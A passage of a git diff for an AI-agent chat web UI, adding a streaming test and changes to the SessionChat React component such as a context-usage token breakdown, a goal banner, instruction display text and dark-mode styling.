+      expect(clientGetMock).toHaveBeenCalledWith('/api/session/sess-1/message');
+    } finally {
+      vi.useRealTimers();
+    }
+  });
+
+  it('finishes streaming when only the local active tool ref is stale', async () => {
+    vi.useFakeTimers();
+    const refetch = vi.fn();
+    const onStreamingDone = vi.fn();
+    try {
+      useSessionMessagesMock.mockReturnValue({
+        messages: [
+          makeMessage({
+            id: 'assistant-1',
+            finish: 'stop',
+            parts: [
+              { id: 'text-1', type: 'text', text: 'done' } as Message['parts'][number],
+            ],
+          }),
+        ],
+        loading: false,
+        refetch,
+        addMessage: vi.fn(),
+        updateMessage: vi.fn(),
+        updateMessagePart: vi.fn(),
+        replaceMessageText: vi.fn(),
+        truncateAfterMessage: vi.fn(),
+      });
+      clientGetMock.mockImplementation((url: string) => {
+        if (url === '/api/session/sess-1/message') {
+          return Promise.resolve({
+            data: [
+              {
+                info: {
+                  id: 'assistant-1',
+                  sessionID: 'sess-1',
+                  role: 'assistant',
+                  finish: 'stop',
+                },
+                parts: [
+                  { id: 'text-1', type: 'text', text: 'done' },
+                ],
+              },
+            ],
+          });
+        }
+        if (url === '/api/session/status') {
+          return Promise.resolve({ data: { 'sess-1': { type: 'idle' } } });
+        }
+        return Promise.resolve({ data: {} });
+      });
+
+      render(React.createElement(SessionChat, {
+        sessionId: 'sess-1',
+        live: true,
+        onStreamingDone,
+      }));
+      act(() => {
+        useSSEOptionsRef.current.onEvent({
+          type: 'session.status',
+          properties: { sessionID: 'sess-1', status: { type: 'busy' } },
+        });
+        useSSEOptionsRef.current.onEvent({
+          type: 'message.part.updated',
+          properties: {
+            part: {
+              id: 'tool-1',
+              messageID: 'assistant-1',
+              sessionID: 'sess-1',
+              type: 'tool',
+              state: { status: 'running' },
+            },
+          },
+        });
+      });
+
+      await act(async () => {
+        await vi.advanceTimersByTimeAsync(5_000);
+      });
+
+      expect(refetch).toHaveBeenCalled();
+      expect(onStreamingDone).toHaveBeenCalled();
+    } finally {
+      vi.useRealTimers();
+    }
+  });
+});
+
 describe('areChatMessagePartsRenderEqual', () => {
   it('detects streamed text updates even when a later tool part exists', () => {
     const sharedToolPart = {
diff --git a/webui/src/components/common/SessionChat.tsx b/webui/src/components/common/SessionChat.tsx
index c2e26ab30..23212a683 100644
--- a/webui/src/components/common/SessionChat.tsx
+++ b/webui/src/components/common/SessionChat.tsx
@@ -1,23 +1,23 @@
 /**
- * SessionChat — 统一的 Agent Session 对话组件
+ * SessionChat — shared Agent Session conversation component.
  *
- * 产品中所有需要 AI 对话能力的地方都应使用此组件：
- * - Session 会话主页面 (compact=false)
- * - 工作流编辑对话面板
- * - 任务执行详情面板
- * - ChatDialog 弹窗
- * - EntitySheet Rex 对话 Tab
+ * Use this component anywhere the product needs an AI conversation surface:
+ * - Main Session page (compact=false)
+ * - Workflow edit chat panel
+ * - Task execution detail panel
+ * - ChatDialog modal
+ * - EntitySheet Rex chat tab
  *
- * 功能：
- * - 加载并展示指定 session 的完整对话消息
- * - SSE 实时流式更新
- * - 渲染 text / reasoning / tool 三种 part 类型
- * - 底部追问输入框（可通过 hideInput 隐藏）
- * - 消息复制、时间戳等可选功能
+ * Capabilities:
+ * - Load and render the complete conversation for a session
+ * - Stream live updates over SSE
+ * - Render text, reasoning, and tool parts
+ * - Provide a follow-up composer that can be hidden with hideInput
+ * - Support optional copy actions, timestamps, and related affordances
  */
 
-import { useState, useCallback, useRef, useEffect, useMemo, memo } from 'react';
-import { Send, Loader2, ChevronDown, Square, Copy, User, FileText, AlertCircle, X, RefreshCw, Pencil, Save, ImageIcon, Paperclip, ArrowUp, Clock, CheckCircle2, XCircle, Brain, Trash2, Bot } from 'lucide-react';
+import { useState, useCallback, useRef, useEffect, useLayoutEffect, useMemo, memo } from 'react';
+import { Send, Loader2, ChevronDown, Square, Copy, User, FileText, AlertCircle, X, RefreshCw, Pencil, Save, ImageIcon, Paperclip, ArrowUp, Clock, CheckCircle2, XCircle, Brain, Trash2, Bot, Check, ListTree } from 'lucide-react';
 import { StreamingMarkdown } from './StreamingMarkdown';
 import { useTranslation } from 'react-i18next';
 import LoadingSpinner from './LoadingSpinner';
@@ -29,7 +29,7 @@ import { useSessionMessages } from '@/hooks/useSessions';
 import { useSSE, type SSEConnectionStatus } from '@/hooks/useSSE';
 import { useReasoningToggle } from '@/hooks/useReasoningToggle';
 import { usePendingQuestions, type PendingQuestion } from '@/hooks/usePendingQuestions';
-import { sessionApi, type QueuedPrompt } from '@/api/session';
+import { sessionApi, type ContextUsageSnapshot, type QueuedPrompt } from '@/api/session';
 import client, { getApiBase } from '@/api/client';
 import { commandAPI, type Command } from '@/api/skill';
 import type { Agent } from '@/api/agent';
@@ -48,7 +48,7 @@ import {
   readFileAsDataUrl,
   type ImagePartData,
 } from '@/utils/imageUpload';
-import type { Message, MessagePart, ToolState } from '@/types';
+import type { Message, MessagePart, SessionGoalState, ToolState } from '@/types';
 
 export { formatSmartTime };
 export type { SSEConnectionStatus };
@@ -71,13 +71,45 @@ export interface NodeRef {
   description?: string;
 }
 
+type GoalBannerStatus = 'active' | 'completed' | 'blocked' | 'paused';
+
+interface GoalBannerState {
+  objective: string;
+  status: GoalBannerStatus;
+  reason?: string;
+}
+
 export interface ConversationBottomSlotActions {
-  sendPrompt: (text: string) => void;
+  sendPrompt: (text: string, options?: PromptDisplayOptions) => void;
   setInput: (text: string) => void;
   focusInput: () => void;
   sending: boolean;
   streaming: boolean;
   sessionId?: string | null;
+  hasMessages: boolean;
+}
+
+export interface PromptDisplayOptions {
+  displayText?: string;
+}
+
+const INSTRUCTION_DISPLAY_PREFIX = '@@flocks-instruction:';
+
+export function buildInstructionDisplayText(label: string): string {
+  return `${INSTRUCTION_DISPLAY_PREFIX}${label}`;
+}
+
+export function parseInstructionDisplayText(text: string): string | null {
+  return text.startsWith(INSTRUCTION_DISPLAY_PREFIX)
+    ? text.slice(INSTRUCTION_DISPLAY_PREFIX.length).trim() || null
+    : null;
+}
+
+function getMessagePartDisplayText(part: MessagePart): string {
+  const metadataDisplayText = part.metadata?.displayText ?? part.metadata?.display_text;
+  return typeof metadataDisplayText === 'string' && metadataDisplayText
+    ? metadataDisplayText
+    : part.text || '';
 }
 
 /** Display-related options grouped to reduce prop surface. */
@@ -90,6 +122,10 @@ export interface SessionChatDisplay {
   showActions?: boolean;
   /** Show timestamp below each message */
   showTimestamp?: boolean;
+  /** Default-collapse intermediate reasoning and tool-process details in embedded panels. */
+  collapseIntermediateSteps?: boolean;
+  /** Initial open state for grouped reasoning/tool-process details. */
+  processGroupsDefaultOpen?: boolean;
 }
 
 export interface SessionChatProps {
@@ -163,6 +199,7 @@ export interface SessionChatProps {
     imageParts?: ImagePartData[],
     agentOverride?: string,
     modelOverride?: { providerID: string; modelID: string } | null,
+    options?: PromptDisplayOptions,
   ) => Promise<unknown> | unknown;
   /** Called when the user sends "/new" to create a new session */
   onCreateNewSession?: () => Promise<void> | void;
@@ -203,6 +240,15 @@ function countTokensLikeCompaction(text: string | null | undefined): number {
   return Math.floor(text.length / APPROX_CHARS_PER_TOKEN);
 }
 
+const INSIGNIFICANT_THINKING_TEXT_RE = /^[\p{P}\p{S}]+$/u;
+
+export function getRenderableThinkingText(part: Pick<MessagePart, 'type' | 'text' | 'thinking'>): string {
+  if (part.type !== 'reasoning' && part.type !== 'thinking') return '';
+  const text = (part.text || part.thinking || '').trim();
+  if (!text || INSIGNIFICANT_THINKING_TEXT_RE.test(text)) return '';
+  return text;
+}
+
 function stringifyToolPayload(value: unknown): string {
   if (value == null) return '';
   if (typeof value === 'string') return value;
@@ -217,7 +263,7 @@ function estimatePartTokens(part: MessagePart): number {
   if (part.type === 'text') {
     return countTokensLikeCompaction(part.text);
   }
-  if (part.type === 'reasoning') {
+  if (part.type === 'reasoning' || part.type === 'thinking') {
     return countTokensLikeCompaction(part.text);
   }
   if (part.type === 'tool' && part.state) {
@@ -231,11 +277,203 @@ function estimatePartTokens(part: MessagePart): number {
   return 0;
 }
 
-function estimateContextTokens(messages: Message[], draft: string): number {
-  const messageTokens = messages.reduce((total, message) => (
-    total + message.parts.reduce((sum, part) => sum + estimatePartTokens(part), 0)
+export interface ContextUsageBreakdownSegment {
+  key:
+    | 'systemPrompt'
+    | 'toolDefinitions'
+    | 'tools'
+    | 'skillLoad'
+    | 'agentDelegation'
+    | 'conversation'
+    | 'reasoning'
+    | 'draft'
+    | 'compactedHistory';
+  tokens: number;
+  colorClass: string;
+  included: boolean;
+}
+
+export interface ContextUsageBreakdown {
+  usedTokens: number;
+  compactedTokens: number;
+  segments: ContextUsageBreakdownSegment[];
+  excludedSegments: ContextUsageBreakdownSegment[];
+}
+
+const CONTEXT_SEGMENT_COLORS: Record<ContextUsageBreakdownSegment['key'], string> = {
+  systemPrompt: 'bg-zinc-400',
+  toolDefinitions: 'bg-violet-400',
+  tools: 'bg-indigo-400',
+  skillLoad: 'bg-amber-400',
+  agentDelegation: 'bg-emerald-500',
+  conversation: 'bg-slate-500',
+  reasoning: 'bg-rose-400',
+  draft: 'bg-sky-400',
+  compactedHistory: 'bg-zinc-300',
+};
+
+const CONTEXT_SEGMENT_KEYS = new Set(Object.keys(CONTEXT_SEGMENT_COLORS));
+const CONTEXT_USAGE_FIXED_SEGMENT_KEYS = [
+  'systemPrompt',
+  'toolDefinitions',
+  'conversation',
+  'reasoning',
+  'tools',
+  'skillLoad',
+  'agentDelegation',
+] as const satisfies readonly ContextUsageBreakdownSegment['key'][];
+const CONTEXT_USAGE_FIXED_SEGMENT_KEY_SET = new Set<ContextUsageBreakdownSegment['key']>(
+  CONTEXT_USAGE_FIXED_SEGMENT_KEYS,
+);
+
+function estimateMessageTokens(message: Message): number {
+  return message.parts.reduce((sum, part) => sum + estimatePartTokens(part), 0);
+}
+
+function estimateActiveMessageBreakdown(messages: Message[]): Pick<ContextUsageBreakdown, 'segments' | 'usedTokens'> {
+  let conversationTokens = 0;
+  let reasoningTokens = 0;
+
+  messages.forEach((message) => {
+    if (message.compacted) return;
+    message.parts.forEach((part) => {
+      const tokens = estimatePartTokens(part);
+      if (part.type === 'reasoning' || part.type === 'thinking') {
+        reasoningTokens += tokens;
+      } else {
+        conversationTokens += tokens;
+      }
+    });
+  });
+
+  const segments: ContextUsageBreakdownSegment[] = [];
+  if (conversationTokens > 0) {
+    segments.push({
+      key: 'conversation',
+      tokens: conversationTokens,
+      colorClass: CONTEXT_SEGMENT_COLORS.conversation,
+      included: true,
+    });
+  }
+  if (reasoningTokens > 0) {
+    segments.push({
+      key: 'reasoning',
+      tokens: reasoningTokens,
+      colorClass: CONTEXT_SEGMENT_COLORS.reasoning,
+      included: true,
+    });
+  }
+
+  return {
+    usedTokens: conversationTokens + reasoningTokens,
+    segments,
+  };
+}
+
+function normalizeContextSegment(segment: {
+  key: string;
+  tokens: number;
+  included?: boolean;
+}): ContextUsageBreakdownSegment | null {
+  const rawKey = segment.key === 'otherContext' ? 'conversation' : segment.key;
+  if (!CONTEXT_SEGMENT_KEYS.has(rawKey)) {
+    return null;
+  }
+  const key = rawKey as ContextUsageBreakdownSegment['key'];
+  return {
+    key,
+    tokens: Math.max(0, Math.round(segment.tokens || 0)),
+    colorClass: CONTEXT_SEGMENT_COLORS[key],
+    included: segment.included !== false,
+  };
+}
+
+function addContextSegmentTokens(
+  segments: ContextUsageBreakdownSegment[],
+  key: ContextUsageBreakdownSegment['key'],
+  tokens: number,
+): void {
+  if (tokens <= 0) return;
+  const existing = segments.find((segment) => segment.key === key);
+  if (existing) {
+    existing.tokens += tokens;
+    return;
+  }
+  segments.push({
+    key,
+    tokens,
+    colorClass: CONTEXT_SEGMENT_COLORS[key],
+    included: true,
+  });
+}
+
+function normalizeFixedContextSegments(
+  segments: ContextUsageBreakdownSegment[],
+): ContextUsageBreakdownSegment[] {
+  const byKey = new Map<ContextUsageBreakdownSegment['key'], ContextUsageBreakdownSegment>();
+  for (const segment of segments) {
+    if (!CONTEXT_USAGE_FIXED_SEGMENT_KEY_SET.has(segment.key)) {
+      continue;
+    }
+    const existing = byKey.get(segment.key);
+    if (existing) {
+      existing.tokens += segment.tokens;
+    } else {
+      byKey.set(segment.key, { ...segment, included: true });
+    }
+  }
+
+  return CONTEXT_USAGE_FIXED_SEGMENT_KEYS.map((key) => {
+    const segment = byKey.get(key);
+    if (segment) {
+      return segment;
+    }
+    return {
+      key,
+      tokens: 0,
+      colorClass: CONTEXT_SEGMENT_COLORS[key],
+      included: true,
+    };
+  });
+}
+
+export function buildContextUsageBreakdown(
+  messages: Message[],
+  draft: string,
+  snapshot?: ContextUsageSnapshot | null,
+): ContextUsageBreakdown {
+  const compactedTokens = messages.reduce((total, message) => (
+    message.compacted ? total + estimateMessageTokens(message) : total
   ), 0);
-  return messageTokens + countTokensLikeCompaction(draft);
+  const draftTokens = countTokensLikeCompaction(draft);
+
+  if (snapshot) {
+    const serverSegments = (snapshot.segments || [])
+      .map(normalizeContextSegment)
+      .filter((segment): segment is ContextUsageBreakdownSegment => Boolean(segment));
+    const segments = [...serverSegments];
+
+    addContextSegmentTokens(segments, 'conversation', draftTokens);
+
+    return {
+      usedTokens: Math.max(0, snapshot.usedTokens || 0) + draftTokens,
+      compactedTokens: Math.max(0, snapshot.compactedTokens || 0),
+      segments: normalizeFixedContextSegments(segments),
+      excludedSegments: [],
+    };
+  }
+
+  const activeBreakdown = estimateActiveMessageBreakdown(messages);
+  const segments: ContextUsageBreakdownSegment[] = [...activeBreakdown.segments];
+
+  addContextSegmentTokens(segments, 'conversation', draftTokens);
+
+  return {
+    usedTokens: activeBreakdown.usedTokens + draftTokens,
+    compactedTokens,
+    segments: normalizeFixedContextSegments(segments),
+    excludedSegments: [],
+  };
 }
 
 function formatTokenCount(tokens: number): string {
@@ -244,9 +482,44 @@ function formatTokenCount(tokens: number): string {
   return String(tokens);
 }
 
-function ContextUsageRing({ percent, title }: { percent: number; title: string }) {
+function getContextUsageLabel(
+  t: ReturnType<typeof useTranslation>['t'],
+  key: ContextUsageBreakdownSegment['key'],
+): string {
+  const fallback: Record<ContextUsageBreakdownSegment['key'], string> = {
+    systemPrompt: 'System prompt',
+    toolDefinitions: 'Tool definitions',
+    tools: 'Tool calls',
+    skillLoad: 'Skill loads',
+    agentDelegation: 'Agent delegation',
+    conversation: 'Conversation',
+    reasoning: 'Reasoning',
+    draft: 'Current draft',
+    compactedHistory: 'Compacted history',
+  };
+  const i18nKey = `chat.contextUsage.breakdown.${key}`;
+  const label = t(i18nKey);
+  return label === i18nKey ? fallback[key] : label;
+}
+
+function ContextUsageRing({
+  percent,
+  title,
+  usedTokens,
+  totalTokens,
+  breakdown,
+}: {
+  percent: number;
+  title: string;
+  usedTokens: number;
+  totalTokens: number;
+  breakdown: ContextUsageBreakdown;
+}) {
+  const { t } = useTranslation('session');
+  const [open, setOpen] = useState(false);
+  const wrapperRef = useRef<HTMLDivElement>(null);
   const clamped = Math.max(0, Math.min(100, percent));
-  const radius = 13;
+  const radius = 9;
   const circumference = 2 * Math.PI * radius;
   const strokeDashoffset = circumference * (1 - clamped / 100);
   const strokeClass = clamped >= 90
@@ -256,27 +529,124 @@ function ContextUsageRing({ percent, title }: { percent: number; title: string }
       : clamped >= 50
         ? 'stroke-sky-500'
         : 'stroke-zinc-400';
+  const rows = breakdown.segments;
+  const activeSegments = breakdown.segments.filter((segment) => segment.tokens > 0);
+
+  useEffect(() => {
+    if (!open) return undefined;
+
+    const handlePointerDown = (event: MouseEvent) => {
+      if (!wrapperRef.current?.contains(event.target as Node)) {
+        setOpen(false);
+      }
+    };
+    const handleKeyDown = (event: KeyboardEvent) => {
+      if (event.key === 'Escape') {
+        setOpen(false);
+      }
+    };
+
+    document.addEventListener('mousedown', handlePointerDown);
+    document.addEventListener('keydown', handleKeyDown);
+    return () => {
+      document.removeEventListener('mousedown', handlePointerDown);
+      document.removeEventListener('keydown', handleKeyDown);
+    };
+  }, [open]);
 
   return (
     <div
-      className="relative inline-flex h-8 w-8 shrink-0 items-center justify-center rounded-full"
-      title={title}
-      aria-label={title}
+      ref={wrapperRef}
+      className="relative inline-flex h-6 w-6 shrink-0 items-center justify-center"
     >
-      <svg className="absolute inset-0 h-8 w-8 -rotate-90" viewBox="0 0 32 32" aria-hidden="true">
-        <circle cx="16" cy="16" r={radius} fill="none" strokeWidth="2.5" className="stroke-zinc-200" />
-        <circle
-          cx="16"
-          cy="16"
-          r={radius}
-          fill="none"
-          strokeWidth="2.5"
-          strokeLinecap="round"
-          className={strokeClass}
-          strokeDasharray={circumference}
-          strokeDashoffset={strokeDashoffset}
-        />
-      </svg>
+      <button
+        type="button"
+        className="relative inline-flex h-6 w-6 items-center justify-center rounded-full transition-colors hover:bg-zinc-200/60 focus-visible:outline focus-visible:outline-2 focus-visible:outline-offset-2 focus-visible:outline-sky-500"
+        title={title}
+        aria-label={title}
+        aria-haspopup="menu"
+        aria-expanded={open}
+        onClick={() => setOpen((value) => !value)}
+      >
+        <svg className="absolute inset-0 h-6 w-6 -rotate-90" viewBox="0 0 24 24" aria-hidden="true">
+          <circle cx="12" cy="12" r={radius} fill="none" strokeWidth="2" className="stroke-zinc-200 dark:stroke-zinc-800" />
+          <circle
+            cx="12"
+            cy="12"
+            r={radius}
+            fill="none"
+            strokeWidth="2"
+            strokeLinecap="round"
+            className={strokeClass}
+            strokeDasharray={circumference}
+            strokeDashoffset={strokeDashoffset}
+          />
+        </svg>
+      </button>
+
+      {open && (
+        <div
+          role="menu"
+          aria-label={t('chat.contextUsage.title')}
+          className="absolute bottom-full right-0 z-50 mb-2 w-80 max-w-[calc(100vw-2rem)] rounded-lg border border-zinc-200 bg-white text-zinc-800 shadow-sm dark:border-zinc-800 dark:bg-zinc-900 dark:text-zinc-200 dark:shadow-xl dark:shadow-black/30"
+        >
+          <div className="border-b border-zinc-100 px-2.5 py-1.5 dark:border-zinc-800">
+            <div className="flex items-center justify-between gap-3">
+              <div className="min-w-0">
+                <div className="truncate text-xs font-semibold text-zinc-700 dark:text-zinc-100">{t('chat.contextUsage.title')}</div>
+                <div className="truncate text-[10px] text-zinc-400 dark:text-zinc-500">
+                  {t('chat.contextUsage.tokens', {
+                    used: formatTokenCount(usedTokens),
+                    total: formatTokenCount(totalTokens),
+                  })}
+                </div>
+              </div>
+              <span className="shrink-0 rounded bg-zinc-50 px-1.5 py-0.5 text-[10px] font-medium text-zinc-500 dark:bg-zinc-800 dark:text-zinc-300">
+                {t('chat.contextUsage.full', { percent: clamped })}
+              </span>
+            </div>
+            <div className="mt-1.5 h-1 overflow-hidden rounded-full bg-zinc-100 dark:bg-zinc-800">
+              <div
+                className="flex h-full overflow-hidden rounded-full"
+                style={{ width: `${clamped}%` }}
+              >
+                {activeSegments.map((segment) => (
+                  <div
+                    key={segment.key}
+                    className={segment.colorClass}
+                    style={{
+                      flex: '0 0 auto',
+                      width: `${Math.min(100, (segment.tokens / Math.max(1, usedTokens)) * 100)}%`,
+                    }}
+                  />
+                ))}
+              </div>
+            </div>
+          </div>
+
+          <div className="max-h-[13.5rem] space-y-0.5 overflow-y-auto p-1.5">
+            {rows.map((segment) => (
+              <div
+                key={segment.key}
+                role="menuitem"
+                className="flex min-w-0 items-center justify-between gap-3 rounded-md px-2 py-1.5 text-xs text-zinc-700 dark:text-zinc-300"
+              >
+                <div className="flex min-w-0 items-center gap-2">
+                  <span className={`h-3 w-3 shrink-0 rounded-[3px] ${segment.colorClass}`} />
+                  <span className="truncate font-medium text-zinc-800 dark:text-zinc-100">
+                    {getContextUsageLabel(t, segment.key)}
+                  </span>
+                </div>
+                <span className={segment.included ? 'shrink-0 text-zinc-600 dark:text-zinc-300' : 'shrink-0 text-zinc-400 dark:text-zinc-500'}>
+                  {segment.included
+                    ? formatTokenCount(segment.tokens)
+                    : t('chat.contextUsage.excludedTokens', { tokens: formatTokenCount(segment.tokens) })}
+                </span>
+              </div>
+            ))}
+          </div>
+        </div>
+      )}
     </div>
   );
 }
@@ -459,10 +829,14 @@ export function getMessageBubbleClassName({
   isEditing: boolean;
 }): string {
   if (compact) {
-    return `max-w-[90%] px-4 py-3 rounded-[20px] text-sm break-words shadow-sm ${
+    const widthClass = isUser
+      ? (isEditing ? 'w-full max-w-full' : 'max-w-full')
+      : 'w-full max-w-full';
+
+    return `${widthClass} px-4 py-3 rounded-[20px] text-sm break-words shadow-sm ${
       isUser
-        ? 'bg-sky-50 border border-sky-100 text-zinc-900'
-        : 'bg-white border border-zinc-200/90'
+        ? 'bg-sky-50 border border-sky-100 text-zinc-900 dark:border-zinc-700 dark:bg-zinc-800 dark:text-zinc-50 dark:shadow-none'
+        : 'bg-white border border-zinc-200/90 dark:border-zinc-800 dark:bg-zinc-900 dark:text-zinc-100 dark:shadow-none'
     }`;
   }
 
@@ -472,11 +846,15 @@ export function getMessageBubbleClassName({
 
   return `${widthClass} px-5 py-4 rounded-[24px] text-sm break-words shadow-sm ${
     isUser
-      ? 'bg-sky-50 border border-sky-100 text-zinc-900'
-      : 'bg-white border border-zinc-200/90'
+      ? 'bg-sky-50 border border-sky-100 text-zinc-900 dark:border-zinc-700 dark:bg-zinc-800 dark:text-zinc-50 dark:shadow-none'
+      : 'bg-white border border-zinc-200/90 dark:border-zinc-800 dark:bg-zinc-900 dark:text-zinc-100 dark:shadow-none'
   }`;
 }
 
+export function getInstructionDisplayBubbleClassName(compact: boolean): string {
+  return `${compact ? 'px-2.5 py-1.5' : 'px-3 py-2'} rounded-lg border border-rose-100 bg-rose-50/80 text-sm text-rose-700 shadow-none dark:border-rose-500/30 dark:bg-rose-950/30 dark:text-rose-200`;
+}
+
 export function getMessageGroupClassName({
   compact,
   isUser,
@@ -487,14 +865,19 @@ export function getMessageGroupClassName({
   isEditing: boolean;
 }): string {
   if (!isUser) {
-    return compact ? 'max-w-[90%]' : 'w-full';
+    return compact ? 'w-full max-w-full' : 'w-full';
   }
 
   if (compact) {
     return isEditing ? 'w-full max-w-[90%]' : 'w-fit max-w-[90%]';
   }
 
-  return isEditing ? 'w-[80%] max-w-[80%]' : 'w-fit max-w-[80%]';
+  return isEditing ? 'w-full max-w-full' : 'w-fit max-w-[88%]';
+}
+
+export function getCompactionDividerClassName(compact: boolean): string {
+  const messageInset = compact ? 'pl-[38px]' : 'pl-[42px]';
+  return `${compact ? 'my-3' : 'my-4'} flex w-full min-w-0 items-center gap-3 ${messageInset} pr-1 text-xs text-zinc-500`;
 }
 
 export function getRegenerateTruncateTarget(
@@ -518,6 +901,21 @@ export function shouldRefetchFinishedMessage({
   return !finishedMessageId || !abortedMessageId || finishedMessageId !== abortedMessageId;
 }
 
+export function isActiveToolPart(part?: Pick<MessagePart, 'type' | 'state'> | null): boolean {
+  return (
+    (part?.type === 'tool' || part?.type === 'toolCall') &&
+    (part.state?.status === 'pending' || part.state?.status === 'running')
+  );
+}
+
+export function hasActiveToolPart(parts?: Array<Pick<MessagePart, 'type' | 'state'>> | null): boolean {
+  return parts?.some(isActiveToolPart) ?? false;
+}
+
+export function isActiveSessionStatus(status?: { type?: string } | null): boolean {
+  return status?.type === 'busy' || status?.type === 'compacting' || status?.type === 'retry';
+}
+
 export function getEditingActionBarClassName(): string {
   return 'mt-3 flex w-full items-center justify-end gap-1.5';
 }
@@ -533,7 +931,12 @@ export function getRenderableFileUrl(url: string): string {
 
   try {
     const parsed = new URL(url);
-    const path = decodeURIComponent(parsed.pathname);
+    let path = decodeURIComponent(parsed.pathname);
+    if (/^\/[A-Za-z]:\//.test(path)) {
+      path = path.slice(1);
+    } else if (parsed.hostname) {
+      path = `//${parsed.hostname}${path}`;
+    }
     return `${getApiBase()}/api/file/download?path=${encodeURIComponent(path)}`;
   } catch {
     return url;
@@ -549,17 +952,46 @@ export function shouldRenderMessage(message: Pick<Message, 'role' | 'parts' | 'f
   ) {
     return false;
   }
+  if (
+    message.role === 'assistant' &&
+    message.finish === 'stop' &&
+    !message.error &&
+    message.parts?.length &&
+    message.parts.every((part) => {
+      if (part.type === 'text') return !(part.text || '').trim();
+      if (part.type === 'reasoning' || part.type === 'thinking') return !getRenderableThinkingText(part);
+      return false;
+    })
+  ) {
+    return false;
+  }
   return true;
 }
 
+export function getMessageErrorText(message: Pick<Message, 'error'>): string {
+  const error = message.error as any;
+  if (!error) return '';
+  if (typeof error === 'string') return error;
+  if (typeof error.data?.displayMessage === 'string' && error.data.displayMessage.trim()) {
+    return error.data.displayMessage;
+  }
+  if (typeof error.message === 'string' && error.message.trim()) return error.message;
+  if (typeof error.data?.message === 'string' && error.data.message.trim()) {
+    return error.data.message;
+  }
+  if (typeof error.code === 'string' && error.code.trim()) return error.code;
+  if (typeof error.name === 'string' && error.name.trim()) return error.name;
+  return 'Message failed';
+}
+
 export function getUserAvatarContainerClassName(compact: boolean): string {
-  return `pointer-events-none absolute left-full top-0 ml-2.5 translate-y-1/2 flex items-center justify-end ${
+  return `pointer-events-none flex flex-shrink-0 items-start justify-center pt-1 ${
     compact ? 'h-7' : 'h-8'
   }`;
 }
 
-export function getUserAvatarSpacerClassName(compact: boolean): string {
-  return compact ? 'h-3.5' : 'h-4';
+export function getUserAvatarSpacerClassName(_compact: boolean): string {
+  return 'h-0';
 }
 
 function areToolStatesRenderEqual(
@@ -659,10 +1091,137 @@ function isAllowedUploadFile(file: File): boolean {
 }
 
 function getQueuedPromptText(item: QueuedPrompt): string {
+  if (typeof item.displayText === 'string' && item.displayText) return item.displayText;
+  if (typeof item.display_text === 'string' && item.display_text) return item.display_text;
   const textPart = item.parts.find((part) => part.type === 'text' && typeof part.text === 'string');
   return typeof textPart?.text === 'string' ? textPart.text : '';
 }
 
+function getGoalBannerKey(goal: GoalBannerState | null): string {
+  return goal ? `${goal.status}:${goal.objective}` : '';
+}
+
+function getDismissedGoalStorageKey(sessionId?: string | null): string | null {
+  return sessionId ? `flocks:session:${sessionId}:dismissedGoal` : null;
+}
+
+function readDismissedGoalKey(sessionId?: string | null): string {
+  const storageKey = getDismissedGoalStorageKey(sessionId);
+  if (!storageKey || typeof window === 'undefined') return '';
+  try {
+    return window.localStorage.getItem(storageKey) || '';
+  } catch {
+    return '';
+  }
+}
+
+function writeDismissedGoalKey(sessionId: string | null | undefined, goalKey: string): void {
+  const storageKey = getDismissedGoalStorageKey(sessionId);
+  if (!storageKey || typeof window === 'undefined') return;
+  try {
+    if (goalKey) {
+      window.localStorage.setItem(storageKey, goalKey);
+    } else {
+      window.localStorage.removeItem(storageKey);
+    }
+  } catch {
+    // Ignore unavailable storage; dismissal still works for the current mount.
+  }
+}
+
+function toGoalBannerState(goal: SessionGoalState | null | undefined): GoalBannerState | null {
+  const objective = typeof goal?.objective === 'string' ? goal.objective.trim() : '';
+  const status = typeof goal?.status === 'string' ? goal.status : '';
+  if (!objective || !['active', 'completed', 'blocked', 'paused'].includes(status)) {
+    return null;
+  }
+  return {
+    objective,
+    status: status as GoalBannerStatus,
+    reason: typeof goal?.reason === 'string' ? goal.reason : undefined,
+  };
+}
+
+function getGoalStatusLabel(t: ReturnType<typeof useTranslation>['t'], status: GoalBannerStatus): string {
+  const fallback: Record<GoalBannerStatus, string> = {
+    active: 'Goal',
+    completed: 'Completed',
+    blocked: 'Blocked',
+    paused: 'Paused',
+  };
+  const key = `chat.goal.status.${status}`;
+  const label = t(key);
+  return label === key ? fallback[status] : label;
+}
+
+function getGoalBannerTone(status: GoalBannerStatus): {
+  root: string;
+  dot: string;
+  icon: React.ReactNode;
+} {
+  if (status === 'completed') {
+    return {
+      root: 'border-emerald-200 bg-emerald-50 text-emerald-900',
+      dot: 'bg-emerald-500',
+      icon: <CheckCircle2 className="h-3.5 w-3.5 text-emerald-600" />,
+    };
+  }
+  if (status === 'blocked') {
+    return {
+      root: 'border-red-200 bg-red-50 text-red-900',
+      dot: 'bg-red-500',
+      icon: <AlertCircle className="h-3.5 w-3.5 text-red-600" />,
+    };
+  }
+  if (status === 'paused') {
+    return {
+      root: 'border-amber-200 bg-amber-50 text-amber-900',
+      dot: 'bg-amber-500',
+      icon: <Clock className="h-3.5 w-3.5 text-amber-600" />,
+    };
+  }
+  return {
+    root: 'border-sky-200 bg-sky-50 text-sky-950',
+    dot: 'bg-sky-500',
+    icon: <ListTree className="h-3.5 w-3.5 text-sky-600" />,
+  };
+}
+
+function GoalBanner({
+  goal,
+  t,
+  onDismiss,
+}: {
+  goal: GoalBannerState;
+  t: ReturnType<typeof useTranslation>['t'];
+  onDismiss: () => void;
+}) {
+  const tone = getGoalBannerTone(goal.status);
+  const statusLabel = getGoalStatusLabel(t, goal.status);
+  return (
+    <div className={`mb-2 flex min-w-0 items-center gap-2 rounded-lg border px-3 py-2 text-xs shadow-sm ${tone.root}`}>
+      <span className={`h-1.5 w-1.5 shrink-0 rounded-full ${tone.dot}`} />
+      <span className="shrink-0">{tone.icon}</span>
+      <span className="shrink-0 font-semibold">{statusLabel}</span>
+      <span className="min-w-0 flex-1 truncate font-medium">{goal.objective}</span>
+      {goal.reason && goal.status !== 'active' && (
+        <span className="hidden min-w-0 max-w-[35%] truncate text-[11px] opacity-70 sm:inline">
+          {goal.reason}
+        </span>
+      )}
+      <button
+        type="button"
+        onClick={onDismiss}
+        className="ml-1 inline-flex h-6 w-6 shrink-0 items-center justify-center rounded-md text-current opacity-60 transition hover:bg-black/5 hover:opacity-100"
+        title={t('chat.goal.dismiss')}
+        aria-label={t('chat.goal.dismiss')}
+      >
+        <X className="h-3.5 w-3.5" />
+      </button>
+    </div>
+  );
+}
+
 interface QueuedPromptPanelProps {
   items: QueuedPrompt[];
   expanded: boolean;
@@ -697,34 +1256,41 @@ function QueuedPromptPanel({
   if (items.length === 0) return null;
 
   return (
-    <div className="mb-2 rounded-xl border border-zinc-200 bg-zinc-950/[0.02] overflow-hidden">
